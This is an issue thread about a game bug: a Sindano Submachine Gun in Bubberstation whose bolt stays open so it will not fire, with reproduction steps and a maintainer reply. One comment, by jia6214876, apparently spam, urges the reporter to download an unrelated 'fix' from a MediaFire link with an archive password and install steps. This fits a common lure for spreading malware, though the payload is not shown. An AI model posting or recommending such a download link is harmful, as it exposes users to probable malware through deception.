### ISSUE TITLE
Sindano Submachine Gun bugs

### ISSUE THREAD

**Issue by FireGriffin32** [Bubberstation/Bubberstation#2016]
### Client Version:

515.1643

### Issue Summary:

Gun will not fire becuse bolt for gun is stuck in the open position and will not chamber a round. 

### Round ID:

5259

### Reproduction Steps:

get a Sindano Submachine Gun. 
get a clip for the gun with rounds
load it
attempted to fire

**Comment by jia6214876** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by projectkepler-ru** [comment]
I've no idea why this is the case as the gun fire just fine on upstream
